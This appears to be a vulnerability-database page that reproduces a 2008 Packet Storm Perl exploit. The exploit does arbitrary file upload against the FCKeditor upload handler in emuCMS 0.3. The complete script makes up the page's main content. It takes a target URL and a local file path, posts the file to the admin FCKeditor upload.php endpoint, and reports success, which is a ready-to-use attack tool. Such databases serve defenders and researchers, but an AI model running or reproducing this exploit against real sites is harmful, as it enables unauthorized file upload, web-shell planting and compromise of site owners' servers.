Lucene search

K

emucms-upload.txt

🗓️ 23 Jun 2008 00:00:00Reported by StackType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 19 Views

Fckeditor Arbitrary File Upload Exploit using Perl

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`#!/usr/bin/perl  
use strict;  
use warnings;  
use LWP::UserAgent;  
use HTTP::Request::Common;  
print <<INTRO;  
+++++++++++++++++++++++++++++++++++++++++++++++++++++  
+emuCMS 0.3 (fckeditor) Arbitrary File Upload xpl +  
+ +  
+ By: Stack +  
+++++++++++++++++++++++++++++++++++++++++++++++++++++  
# t0pP8uZz   
INTRO  
print "Enter URL(ie: http://site.com): ";  
chomp(my $url=<STDIN>);  
  
print "Enter File Path(path to local file to upload): ";  
chomp(my $file=<STDIN>);  
my $ua = LWP::UserAgent->new;  
my $re = $ua->request(POST $url.'/admin/FCKeditor/editor/filemanager/upload/php/upload.php',  
Content_Type => 'form-data',  
Content => [ NewFile => $file ] );  
if($re->is_success) {  
if( index($re->content, "Disabled") != -1 ) { print "Exploit Successfull! File Uploaded!\n"; }  
else { print "File Upload Is Disabled! Failed!\n"; }  
} else { print "HTTP Request Failed!\n"; }  
exit;  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
23 Jun 2008 00:00Current
7.4High risk
Vulners AI Score7.4
19
.json
Report